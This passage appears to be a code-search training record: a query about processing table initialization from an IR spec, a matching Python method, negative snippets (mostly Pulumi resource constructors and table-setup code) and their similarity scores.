\"recipients\", recipients)\n if reminder_interval is not None:\n pulumi.set(__self__, \"reminder_interval\", reminder_interval)\n if time_threshold is not None:\n pulumi.set(__self__, \"time_threshold\", time_threshold)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if value_calculation is not None:\n pulumi.set(__self__, \"value_calculation\", value_calculation)\n if value_threshold is not None:\n pulumi.set(__self__, \"value_threshold\", value_threshold)\n if vhost_regex is not None:\n pulumi.set(__self__, \"vhost_regex\", vhost_regex)", "def __init__(self, args, motor_entry):\n pass", "def __init__(self):\n print \"ABC - Deployer.__init__()\"", "def __init__(__self__, *,\n cidr: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n commissioning_enabled: Optional[pulumi.Input[bool]] = None,\n internet_advertising_disabled: Optional[pulumi.Input[bool]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n parent_custom_ip_prefix_id: Optional[pulumi.Input[str]] = None,\n roa_validity_end_date: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n wan_validation_signed_message: Optional[pulumi.Input[str]] = None,\n zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"cidr\", cidr)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n if commissioning_enabled is not None:\n pulumi.set(__self__, \"commissioning_enabled\", commissioning_enabled)\n if internet_advertising_disabled is not None:\n pulumi.set(__self__, \"internet_advertising_disabled\", internet_advertising_disabled)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if parent_custom_ip_prefix_id is not None:\n pulumi.set(__self__, \"parent_custom_ip_prefix_id\", parent_custom_ip_prefix_id)\n if roa_validity_end_date is not None:\n pulumi.set(__self__, \"roa_validity_end_date\", roa_validity_end_date)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if wan_validation_signed_message is not None:\n pulumi.set(__self__, \"wan_validation_signed_message\", wan_validation_signed_message)\n if zones is not None:\n pulumi.set(__self__, \"zones\", zones)", "def __init__(self, name: str, instance: PartInstance, controlPoints: ModelDotArray):\n super().__init__()\n pass", "def __init__(self, name=None, acronym=None, agency=None, payloadMass=None,\n payloadVolume=None, dryMass=None, propellantMass=None,\n specificImpulse=None, massToLEO=None, reliability=None, cost=None,\n meanTimeBetweenLaunches=None, _id=None):\n self.name = name\n self.acronym = acronym if acronym else name\n self.agency = agency\n self.payloadMass = payloadMass\n self.payloadVolume = payloadVolume\n self.dryMass = dryMass\n self.propellantMass = propellantMass\n self.specificImpulse = specificImpulse\n self.massToLEO = massToLEO\n self.reliability = reliability\n self.cost = cost\n if isinstance(meanTimeBetweenLaunches, Number):\n self.meanTimeBetweenLaunches = isodate.duration_isoformat(datetime.timedelta(days=meanTimeBetweenLaunches))\n else:\n self.meanTimeBetweenLaunches = meanTimeBetweenLaunches\n super(LaunchVehicle,self).__init__(_id, \"LaunchVehicle\")", "def __init__(__self__, *,\n config: pulumi.Input['ConfigArgs'],\n instance_id: pulumi.Input[str],\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"config\", config)\n pulumi.set(__self__, \"instance_id\", instance_id)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if project is not None:\n pulumi.set(__self__, \"project\", project)", "def __init__(__self__, *,\n auto_upgrade_minor_version: pulumi.Input[bool],\n force_update_tag: pulumi.Input[str],\n location: pulumi.Input[str],\n publisher: pulumi.Input[str],\n resource_group: pulumi.Input[str],\n type_handler_version: pulumi.Input[str],\n type_name: pulumi.Input[str],\n vm_name: pulumi.Input[str],\n protected_settings: Optional[pulumi.Input[str]] = None,\n settings: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"auto_upgrade_minor_version\", auto_upgrade_minor_version)\n pulumi.set(__self__, \"force_update_tag\", force_update_tag)\n pulumi.set(__self__, \"location\", location)\n pulumi.set(__self__, \"publisher\", publisher)\n pulumi.set(__self__, \"resource_group\", resource_group)\n pulumi.set(__self__, \"type_handler_version\", type_handler_version)\n pulumi.set(__self__, \"type_name\", type_name)\n pulumi.set(__self__, \"vm_name\", vm_name)\n if protected_settings is not None:\n pulumi.set(__self__, \"protected_settings\", protected_settings)\n if settings is not None:\n pulumi.set(__self__, \"settings\", settings)", "def __init__(__self__, *,\n backend_type: Optional[pulumi.Input['InstanceBackendType']] = None,\n connection_name: Optional[pulumi.Input[str]] = None,\n current_disk_size: Optional[pulumi.Input[str]] = None,\n database_version: Optional[pulumi.Input['InstanceDatabaseVersion']] = None,\n disk_encryption_configuration: Optional[pulumi.Input['DiskEncryptionConfigurationArgs']] = None,\n disk_encryption_status: Optional[pulumi.Input['DiskEncryptionStatusArgs']] = None,\n etag: Optional[pulumi.Input[str]] = None,\n failover_replica: Optional[pulumi.Input['InstanceFailoverReplicaArgs']] = None,\n gce_zone: Optional[pulumi.Input[str]] = None,\n instance_type: Optional[pulumi.Input['InstanceInstanceType']] = None,\n ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input['IpMappingArgs']]]] = None,\n ipv6_address: Optional[pulumi.Input[str]] = None,\n kind: Optional[pulumi.Input[str]] = None,\n maintenance_version: Optional[pulumi.Input[str]] = None,\n master_instance_name: Optional[pulumi.Input[str]] = None,\n max_disk_size: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n on_premises_configuration: Optional[pulumi.Input['OnPremisesConfigurationArgs']] = None,\n out_of_disk_report: Optional[pulumi.Input['SqlOutOfDiskReportArgs']] = None,\n project: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n replica_configuration: Optional[pulumi.Input['ReplicaConfigurationArgs']] = None,\n replica_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n root_password: Optional[pulumi.Input[str]] = None,\n satisfies_pzs: Optional[pulumi.Input[bool]] = None,\n scheduled_maintenance: Optional[pulumi.Input['SqlScheduledMaintenanceArgs']] = None,\n secondary_gce_zone: Optional[pulumi.Input[str]] = None,\n self_link: Optional[pulumi.Input[str]] = None,\n server_ca_cert: Optional[pulumi.Input['SslCertArgs']] = None,\n service_account_email_address: Optional[pulumi.Input[str]] = None,\n settings: Optional[pulumi.Input['SettingsArgs']] = None,\n state: Optional[pulumi.Input['InstanceState']] = None,\n suspension_reason: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceSuspensionReasonItem']]]] = None):\n if backend_type is not None:\n pulumi.set(__self__, \"backend_type\", backend_type)\n if connection_name is not None:\n pulumi.set(__self__, \"connection_name\", connection_name)\n if current_disk_size is not None:\n pulumi.set(__self__, \"current_disk_size\", current_disk_size)\n if database_version is not None:\n pulumi.set(__self__, \"database_version\", database_version)\n if disk_encryption_configuration is not None:\n pulumi.set(__self__, \"disk_encryption_configuration\", disk_encryption_configuration)\n if disk_encryption_status is not None:\n pulumi.set(__self__, \"disk_encryption_status\", disk_encryption_status)\n if etag is not None:\n warnings.warn(\"\"\"This field is deprecated and will be removed from a future version of the API. Use the `settings.settingsVersion` field instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"etag is deprecated: This field is deprecated and will be removed from a future version of the API. Use the `settings.settingsVersion` field instead.\"\"\")\n if etag is not None:\n pulumi.set(__self__, \"etag\", etag)\n if failover_replica is not None:\n pulumi.set(__self__, \"failover_replica\", failover_replica)\n if gce_zone is not None:\n pulumi.set(__self__, \"gce_zone\", gce_zone)\n if instance_type is not None:\n pulumi.set(__self__, \"instance_type\", instance_type)\n if ip_addresses is not None:\n pulumi.set(__self__, \"ip_addresses\", ip_addresses)\n if ipv6_address is not None:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n if ipv6_address is not None:\n pulumi.set(__self__, \"ipv6_address\", ipv6_address)\n if kind is not None:\n pulumi.set(__self__, \"kind\", kind)\n if maintenance_version is not None:\n pulumi.set(__self__, \"maintenance_version\", maintenance_version)\n if master_instance_name is not None:\n pulumi.set(__self__, \"master_instance_name\", master_instance_name)\n if max_disk_size is not None:\n pulumi.set(__self__, \"max_disk_size\", max_disk_size)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if on_premises_configuration is not None:\n pulumi.set(__self__, \"on_premises_configuration\", on_premises_configuration)\n if out_of_disk_report is not None:\n pulumi.set(__self__, \"out_of_disk_report\", out_of_disk_report)\n if project is not None:\n pulumi.set(__self__, \"project\", project)\n if region is not None:\n pulumi.set(__self__, \"region\", region)\n if replica_configuration is not None:\n pulumi.set(__self__, \"replica_configuration\", replica_configuration)\n if replica_names is not None:\n pulumi.set(__self__, \"replica_names\", replica_names)\n if root_password is not None:\n pulumi.set(__self__, \"root_password\", root_password)\n if satisfies_pzs is not None:\n pulumi.set(__self__, \"satisfies_pzs\", satisfies_pzs)\n if scheduled_maintenance is not None:\n pulumi.set(__self__, \"scheduled_maintenance\", scheduled_maintenance)\n if secondary_gce_zone is not None:\n pulumi.set(__self__, \"secondary_gce_zone\", secondary_gce_zone)\n if self_link is not None:\n pulumi.set(__self__, \"self_link\", self_link)\n if server_ca_cert is not None:\n pulumi.set(__self__, \"server_ca_cert\", server_ca_cert)\n if service_account_email_address is not None:\n pulumi.set(__self__, \"service_account_email_address\", service_account_email_address)\n if settings is not None:\n pulumi.set(__self__, \"settings\", settings)\n if state is not None:\n pulumi.set(__self__, \"state\", state)\n if suspension_reason is not None:\n pulumi.set(__self__, \"suspension_reason\", suspension_reason)", "def __init__(self, name=None):\n from uuid import uuid4\n self.inputs = []\n self.uuid = uuid4()\n self.name = name\n\n # RootAction will return new instance only \n # for first node in module\n self.root = RootAction()\n self.root.add_node(self)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n arm_template_display_name: Optional[pulumi.Input[str]] = None,\n deployment_properties: Optional[pulumi.Input[pulumi.InputType['EnvironmentDeploymentPropertiesArgs']]] = None,\n lab_name: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n user_name: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n kms_key: pulumi.Input[str],\n schedule_config: pulumi.Input['DataIntegrationScheduleConfigArgs'],\n source_uri: pulumi.Input[str],\n description: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"kms_key\", kms_key)\n pulumi.set(__self__, \"schedule_config\", schedule_config)\n pulumi.set(__self__, \"source_uri\", source_uri)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)", "def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n certificate_body: Optional[pulumi.Input[str]] = None,\n certificate_chain: Optional[pulumi.Input[str]] = None,\n expiration: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n name_prefix: Optional[pulumi.Input[str]] = None,\n path: Optional[pulumi.Input[str]] = None,\n private_key: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n upload_date: Optional[pulumi.Input[str]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if certificate_body is not None:\n pulumi.set(__self__, \"certificate_body\", certificate_body)\n if certificate_chain is not None:\n pulumi.set(__self__, \"certificate_chain\", certificate_chain)\n if expiration is not None:\n pulumi.set(__self__, \"expiration\", expiration)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if name_prefix is not None:\n pulumi.set(__self__, \"name_prefix\", name_prefix)\n if path is not None:\n pulumi.set(__self__, \"path\", path)\n if private_key is not None:\n pulumi.set(__self__, \"private_key\", private_key)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if upload_date is not None:\n pulumi.set(__self__, \"upload_date\", upload_date)", "def __init__(__self__, *,\n cidr: Optional[pulumi.Input[str]] = None,\n commissioning_enabled: Optional[pulumi.Input[bool]] = None,\n internet_advertising_disabled: Optional[pulumi.Input[bool]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n parent_custom_ip_prefix_id: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n roa_validity_end_date: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n wan_validation_signed_message: Optional[pulumi.Input[str]] = None,\n zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):\n if cidr is not None:\n pulumi.set(__self__, \"cidr\", cidr)\n if commissioning_enabled is not None:\n pulumi.set(__self__, \"commissioning_enabled\", commissioning_enabled)\n if internet_advertising_disabled is not None:\n pulumi.set(__self__, \"internet_advertising_disabled\", internet_advertising_disabled)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if parent_custom_ip_prefix_id is not None:\n pulumi.set(__self__, \"parent_custom_ip_prefix_id\", parent_custom_ip_prefix_id)\n if resource_group_name is not None:\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n if roa_validity_end_date is not None:\n pulumi.set(__self__, \"roa_validity_end_date\", roa_validity_end_date)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if wan_validation_signed_message is not None:\n pulumi.set(__self__, \"wan_validation_signed_message\", wan_validation_signed_message)\n if zones is not None:\n pulumi.set(__self__, \"zones\", zones)" ]
[ "0.66051346", "0.6576527", "0.6427389", "0.63597023", "0.62879163", "0.6271562", "0.6235065", "0.6202321", "0.6141576", "0.6116739", "0.6116739", "0.6116739", "0.6116739", "0.6116739", "0.6116739", "0.61087185", "0.60978323", "0.6088997", "0.60772216", "0.606114", "0.6051864", "0.60461396", "0.60259384", "0.6024794", "0.60247785", "0.6013458", "0.6007375", "0.5995422", "0.5993116", "0.59827495", "0.59779686", "0.5971315", "0.5955377", "0.59530175", "0.5950027", "0.5935022", "0.5931572", "0.5899046", "0.5890312", "0.5888185", "0.58693665", "0.58659136", "0.5846774", "0.5840591", "0.58362657", "0.5830005", "0.58209157", "0.5810091", "0.5808484", "0.58076406", "0.580229", "0.57943755", "0.5776336", "0.5775394", "0.5775096", "0.5770291", "0.5764683", "0.5764029", "0.57589847", "0.57549375", "0.5749134", "0.5742931", "0.5742255", "0.5732621", "0.57275844", "0.57128584", "0.5702848", "0.5698831", "0.5697905", "0.56953007", "0.56948227", "0.5692294", "0.5691121", "0.5687839", "0.5686938", "0.56860197", "0.567637", "0.567495", "0.5669458", "0.5666264", "0.5664908", "0.5660109", "0.56590515", "0.56569326", "0.56518143", "0.5650338", "0.5649117", "0.5648419", "0.56473076", "0.5646023", "0.5645606", "0.5640261", "0.5635445", "0.56338835", "0.56315714", "0.5630186", "0.5628999", "0.5625867", "0.5615004", "0.5614922" ]
0.7563762
0
Process any table initialization spec from the IR desc The IR specification may provide a set of table initialization operations in a "table_initialization" object. This takes the form of a sequence of table entry specifications.
def process_table_init(self): logging.debug("Processing table initialization, %d entries", len(self.table_initialization)) for init_entry in self.table_initialization: for table_name, entry_desc in init_entry.items(): self.air_table[table_name].add_entry( table_entry.description_to_entry(entry_desc))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_up_tables(self):\n tables = []\n tables.append({'groupname': 'metadata',\n 'tablename': 'sim_info',\n 'description': desc.SimInfoRow,\n 'tabletitle': 'Simulation Information'})\n tables.append({'groupname': 'metadata',\n 'tablename': 'sim_timeseries',\n 'description': desc.SimTimeseriesRow,\n 'tabletitle': 'Simulation Power Data'})\n tables.append({'groupname': 'th',\n 'tablename': 'th_params',\n 'description': desc.ThMetadataRow,\n 'tabletitle': 'TH Component Parameters'})\n tables.append({'groupname': 'th',\n 'tablename': 'th_timeseries',\n 'description': desc.ThTimeseriesRow,\n 'tabletitle': 'TH Timeseries'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'neutronics_timeseries',\n 'description': desc.NeutronicsTimeseriesRow,\n 'tabletitle': 'Neutronics Timeseries'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'neutronics_params',\n 'description': desc.NeutronicsParamsRow,\n 'tabletitle': 'Neutronics Metadata'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'zetas',\n 'description': desc.ZetasTimestepRow,\n 'tabletitle': 'Neutron Precursor Concentrations'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'omegas',\n 'description': desc.OmegasTimestepRow,\n 'tabletitle': 'Decay Heat Fractions'})\n return tables", "def full_initialization_process():\n\n db1 = Database('TOBACCO_RAW;')\n con1, cur1 = db1.connect()\n cur1.execute('create index idl_doc_field_id_idx on idl_doc_field(id);')\n cur1.execute('create index idl_doc_id_idx on idl_doc(id);')\n add_timestamp_to_idl_doc()\n\n create_utf_text_files()\n\n initialize_tables()\n fill_tables()", "def __init__(self, *args):\n _table.Table_swiginit(self, _table.new_Table(*args))", "def init_line_list():\n # Get str lengths from defs\n len_line = defs.str_len()['ion']\n len_src = defs.str_len()['Source']\n # Load sources to check\n sources = arcl_io.load_source_table()\n src_files = sources['File'].data\n if len(src_files[0]) > len_src:\n raise ValueError(\"Source filename now exceeds table. Should fix source name\")\n dummy_src = str('#')*len_src\n # Arc Line name\n dummy_line = str('#')*len_line\n #\n\n # Dict for Table\n idict = OrderedDict()\n idict['ion'] = dummy_line\n idict['wave'] = 0.\n idict['NIST'] = 0\n idict['Instr'] = 0 # Flag for instrument\n idict['amplitude'] = 0\n idict['Source'] = dummy_src\n\n # Table\n tkeys = idict.keys()\n lst = [[idict[tkey]] for tkey in tkeys]\n init_tbl = Table(lst, names=tkeys)\n\n # Return\n return init_tbl", "def tables(args):\n\n config_file = args.setupfn\n conf_base = os.path.basename(config_file).split('.')[0]\n statfile = os.path.join(args.outputdir,\n \"{}_radvel.stat\".format(conf_base))\n status = load_status(statfile)\n\n assert status.getboolean('mcmc', 'run'), \\\n \"Must run MCMC before making tables\"\n\n P, post = radvel.utils.initialize_posterior(config_file)\n post = radvel.posterior.load(status.get('fit', 'postfile'))\n chains = pd.read_csv(status.get('mcmc', 'chainfile'))\n minafactor = status.get('mcmc', 'minafactor')\n maxarchange = status.get('mcmc', 'maxarchange')\n maxgr = status.get('mcmc', 'maxgr')\n mintz = status.get('mcmc', 'mintz')\n if 'derive' in status.sections() and status.getboolean('derive', 'run'):\n dchains = pd.read_csv(status.get('derive', 'chainfile'))\n chains = chains.join(dchains, rsuffix='_derived')\n derived = True\n else:\n derived = False\n report = radvel.report.RadvelReport(P, post, chains, minafactor, maxarchange, maxgr, mintz, derived=derived)\n tabletex = radvel.report.TexTable(report)\n attrdict = {'priors': 'tab_prior_summary', 'rv': 'tab_rv',\n 'params': 'tab_params', 'derived': 'tab_derived',\n 'crit': 'tab_crit'}\n for tabtype in args.type:\n print(\"Generating LaTeX code for {} table\".format(tabtype))\n\n if tabtype == 'ic_compare':\n assert status.has_option('ic_compare', 'ic'), \\\n \"Must run Information Criteria comparison before making comparison tables\"\n\n compstats = eval(status.get('ic_compare', 'ic'))\n report = radvel.report.RadvelReport(\n P, post, chains, minafactor, maxarchange, maxgr, mintz, compstats=compstats\n )\n tabletex = radvel.report.TexTable(report)\n tex = tabletex.tab_comparison()\n elif tabtype == 'rv':\n tex = getattr(tabletex, attrdict[tabtype])(name_in_title=args.name_in_title, max_lines=None)\n elif tabtype == 'crit':\n tex = getattr(tabletex, attrdict[tabtype])(name_in_title=args.name_in_title)\n else:\n if tabtype == 'derived':\n assert status.has_option('derive', 'run'), \\\n \"Must run `radvel derive` before making derived parameter table\"\n assert tabtype in attrdict, 'Invalid Table Type %s ' % tabtype\n tex = getattr(tabletex, attrdict[tabtype])(name_in_title=args.name_in_title)\n\n saveto = os.path.join(\n args.outputdir, '{}_{}.tex'.format(conf_base, tabtype)\n )\n with open(saveto, 'w+') as f:\n f.write(tex)\n\n savestate = {'{}_tex'.format(tabtype): os.path.relpath(saveto)}\n save_status(statfile, 'table', savestate)", "def _initialize(self, chain, length):\n # If the table already exists, exit now.\n if chain != 0:\n return\n\n # Determine size\n try:\n size = len(self._getfunc())\n except TypeError:\n size = 1\n\n query = \"create table %s (recid INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, trace int(5), %s FLOAT)\" % (self.name, ' FLOAT, '.join(['v%s' % (x+1) for x in range(size)]))\n self.db.cur.execute(query)", "def fill_table(self, executer, tree, cursor, table):\n counter = 0\n table_content = executer.lots_of_eggs(cursor, table)\n for line in table_content:\n tree.insert('', 'end', text=counter, values=line)\n counter += 1", "def finalize_tables(self):\n self.attrbuilder.finalize(self.ext_type)\n self.vtabbuilder.finalize(self.ext_type)", "def make_table_declarations(ibs):\n # available tables\n TABLENAME_LIST = [\n IMAGE_TABLE,\n ANNOTATION_TABLE,\n # NAME_TABLE,\n IMAGESET_TABLE,\n IMAGE_GRID,\n THUMB_TABLE,\n NAMES_TREE,\n ]\n\n # table nice names\n TABLE_NICE = {\n IMAGE_TABLE: 'Image Table',\n ANNOTATION_TABLE: 'Annotations Table',\n NAME_TABLE: 'Name Table',\n QRES_TABLE: 'Query Results Table',\n IMAGESET_TABLE: 'ImageSet Table',\n IMAGE_GRID: 'Thumbnail Grid',\n THUMB_TABLE: 'Thumbnail Table',\n NAMES_TREE: 'Tree of Names',\n }\n\n # COLUMN DEFINITIONS\n # the columns each wbia table has,\n TABLE_COLNAMES = {\n IMAGE_TABLE: [\n 'gid',\n 'thumb',\n # 'nAids',\n 'img_gname',\n # 'ext',\n 'reviewed', # detection reviewed flag is not fullyused\n 'datetime',\n 'gps',\n 'orientation',\n 'party_tag',\n 'contributor_tag',\n # 'gdconf',\n 'imgnotes',\n 'image_uuid',\n ],\n # debug with\n # --noannottbl\n # --nonametree\n # even just aid seems to be very slow\n ANNOTATION_TABLE: [\n # 'annotation_uuid',\n 'aid',\n 'thumb',\n 'annot_gname',\n 'name',\n 'exemplar',\n 'species', # <put back in\n 'viewpoint',\n 'quality_text',\n 'age_min',\n 'age_max',\n 'sex_text',\n # 'rdconf',\n # 'nGt', # ## <put back in\n 'imagesettext_names',\n 'annotnotes', # ## <put back in\n 'tag_text', # < Hack should have actual tag structure\n # 'annot_visual_uuid',\n # 'nFeats',\n # 'bbox',\n # 'theta',\n # 'verts',\n # 'num_verts',\n ],\n NAME_TABLE: ['nid', 'name', 'nAids', 'namenotes'],\n QRES_TABLE: ['rank', 'score', 'name', 'aid'],\n IMAGESET_TABLE: [\n 'imagesettext',\n 'nImgs',\n # 'num_imgs_reviewed',\n # 'num_annotmatch_reviewed',\n # 'imageset_end_datetime',\n # 'imageset_processed_flag',\n # 'imageset_shipped_flag',\n 'imgsetid',\n ],\n NAMES_TREE: [\n 'name',\n 'nAids',\n 'thumb',\n 'nid',\n # 'exemplar',\n # 'nExAids',\n 'aid',\n # 'annot_gname',\n # 'quality_text',\n # 'age_min',\n # 'age_max',\n # 'sex_text',\n # 'imagesettext_names',\n # 'datetime',\n # 'max_hourdiff',\n # 'max_speed',\n # 'has_split',\n # 'namenotes',\n ],\n IMAGE_GRID: ['thumb'],\n # TEST TABLE\n THUMB_TABLE: ['img_gname', 'thumb'],\n }\n\n # dynamicly defined headers\n if not const.SIMPLIFY_INTERFACE:\n from wbia.control import accessor_decors\n\n if accessor_decors.API_CACHE:\n # Too slow without api cache\n TABLE_COLNAMES[IMAGESET_TABLE].extend(\n ['percent_annotmatch_reviewed_str', 'percent_names_with_exemplar_str']\n )\n TABLE_COLNAMES[IMAGESET_TABLE].extend(\n [\n # 'percent_imgs_reviewed_str',\n 'imageset_start_datetime',\n # 'imageset_end_datetime',\n 'imageset_duration',\n 'imageset_notes',\n ]\n )\n\n if ibs.cfg.other_cfg.show_shipped_imagesets:\n TABLE_COLNAMES[IMAGESET_TABLE].extend(\n ['imageset_processed_flag', 'imageset_shipped_flag']\n )\n\n # THUMB_TABLE : ['thumb' 'thumb' 'thumb' 'thumb'],\n # NAMES_TREE : {('name' 'nid' 'nAids') : ['aid' 'bbox' 'thumb']}\n\n TABLE_TREE_LEVELS = {\n NAMES_TREE: {\n 'name': 0,\n 'namenotes': 0,\n 'nid': 0,\n 'nAids': 0,\n 'nExAids': 0,\n 'sex_text': 0,\n 'exemplar': 1,\n 'thumb': 1,\n 'viewpoint': 1,\n 'quality_text': 1,\n 'age_min': 1,\n 'age_max': 1,\n 'imagesettext_names': 1,\n 'aid': 1,\n 'annot_gname': 1,\n 'datetime': 1,\n 'max_hourdiff': 0,\n 'max_speed': 0,\n 'has_split': 0,\n },\n }\n\n # the columns which are editable\n TABLE_EDITSET = {\n IMAGE_TABLE: {'reviewed', 'imgnotes', 'gps'},\n ANNOTATION_TABLE: {\n 'name',\n 'species',\n 'annotnotes',\n 'exemplar',\n 'viewpoint',\n 'quality_text',\n 'age_min',\n 'age_max',\n 'sex_text',\n 'tag_text',\n },\n NAME_TABLE: {'name', 'namenotes'},\n QRES_TABLE: {'name'},\n IMAGESET_TABLE: {\n 'imagesettext',\n 'imageset_shipped_flag',\n 'imageset_processed_flag',\n },\n IMAGE_GRID: set(),\n THUMB_TABLE: set(),\n NAMES_TREE: {\n 'exemplar',\n 'name',\n 'namenotes',\n 'viewpoint',\n 'quality_text',\n 'age_min',\n 'age_max',\n 'sex_text',\n },\n }\n\n if const.SIMPLIFY_INTERFACE:\n TABLE_EDITSET[NAMES_TREE].remove('name')\n\n TABLE_HIDDEN_LIST = {\n # IMAGE_TABLE : [False, True, False, False, False, True, False, False, False, False, False],\n # ANNOTATION_TABLE : [False, False, False, False, False, False, False, True, True, True, True, True, True],\n # NAMES_TREE : [False, False, False, False, False, False],\n # NAME_TABLE : [False, False, False, False],\n }\n\n TABLE_STRIPE_LIST = {\n IMAGE_GRID: 9,\n }\n\n # Define the valid columns a table could have\n COL_DEF = dict(\n [\n ('annot_visual_uuid', (str, 'Annot Visual UUID')),\n ('image_uuid', (str, 'Image UUID')),\n ('gid', (int, 'Image ID')),\n ('aid', (int, 'Annotation ID')),\n ('nid', (int, 'Name ID')),\n ('imgsetid', (int, 'ImageSet ID')),\n ('nAids', (int, '#Annots')),\n ('nExAids', (int, '#Exemplars')),\n ('nGt', (int, '#GT')),\n ('nImgs', (int, '#Imgs')),\n ('nFeats', (int, '#Features')),\n ('quality_text', (str, 'Quality')),\n ('imagesettext_names', (str, 'ImageSet Names')),\n ('age_min', (int, 'Age (min)')),\n ('age_max', (int, 'Age (max)')),\n ('sex_text', (str, 'Sex')),\n ('rank', (str, 'Rank')), # needs to be a string for !Query\n ('unixtime', (float, 'unixtime')),\n ('species', (str, 'Species')),\n ('viewpoint', (str, 'Viewpoint')),\n ('img_gname', (str, 'Image Name')),\n ('annot_gname', (str, 'Source Image')),\n ('gdconf', (str, 'Detection Confidence')),\n ('rdconf', (float, 'Detection Confidence')),\n ('name', (str, 'Name')),\n ('annotnotes', (str, 'Annot Notes')),\n ('namenotes', (str, 'Name Notes')),\n ('imgnotes', (str, 'Image Notes')),\n ('match_name', (str, 'Matching Name')),\n ('bbox', (str, 'BBOX (x, y, w, h))')), # Non editables are safe as strs\n ('num_verts', (int, 'NumVerts')),\n ('verts', (str, 'Verts')),\n ('score', (str, 'Confidence')),\n ('theta', (str, 'Theta')),\n ('reviewed', (bool, 'Detection Reviewed')),\n ('exemplar', (bool, 'Is Exemplar')),\n ('imagesettext', (str, 'ImageSet')),\n ('datetime', (str, 'Date / Time')),\n ('ext', (str, 'EXT')),\n ('thumb', ('PIXMAP', 'Thumb')),\n ('gps', (str, 'GPS')),\n ('orientation', (str, 'Orientation')),\n ('imageset_processed_flag', (bool, 'Processed')),\n ('imageset_shipped_flag', (bool, 'Commited')),\n ('imageset_start_datetime', (str, 'Start Time')),\n ('imageset_end_datetime', (str, 'End Time')),\n ('imageset_duration', (str, 'Duration')),\n ('imageset_notes', (str, 'Notes')),\n ('party_tag', (str, 'Party')),\n ('contributor_tag', (str, 'Contributor')),\n ('percent_imgs_reviewed_str', (str, '%Imgs Reviewed')),\n ('percent_annotmatch_reviewed_str', (str, '%Queried')),\n ('num_imgs_reviewed', (str, '#Imgs Reviewed')),\n ('num_annotmatch_reviewed', (str, '#Matches Reviewed')),\n ('percent_names_with_exemplar_str', (str, '%Names with Exemplar')),\n ('max_speed', (float, 'Max Speed km/h')),\n ('has_split', (float, 'Needs Split')),\n ('max_hourdiff', (float, 'Max Hour Diff')),\n ('tag_text', (str, 'Tags')),\n ]\n )\n\n declare_tup = (\n TABLENAME_LIST,\n TABLE_NICE,\n TABLE_COLNAMES,\n TABLE_TREE_LEVELS,\n TABLE_EDITSET,\n TABLE_HIDDEN_LIST,\n TABLE_STRIPE_LIST,\n COL_DEF,\n )\n return declare_tup", "def initialize(self):\n\n cursor = self.conn.cursor()\n\n # This table can be used as a parent for a collection of runs\n 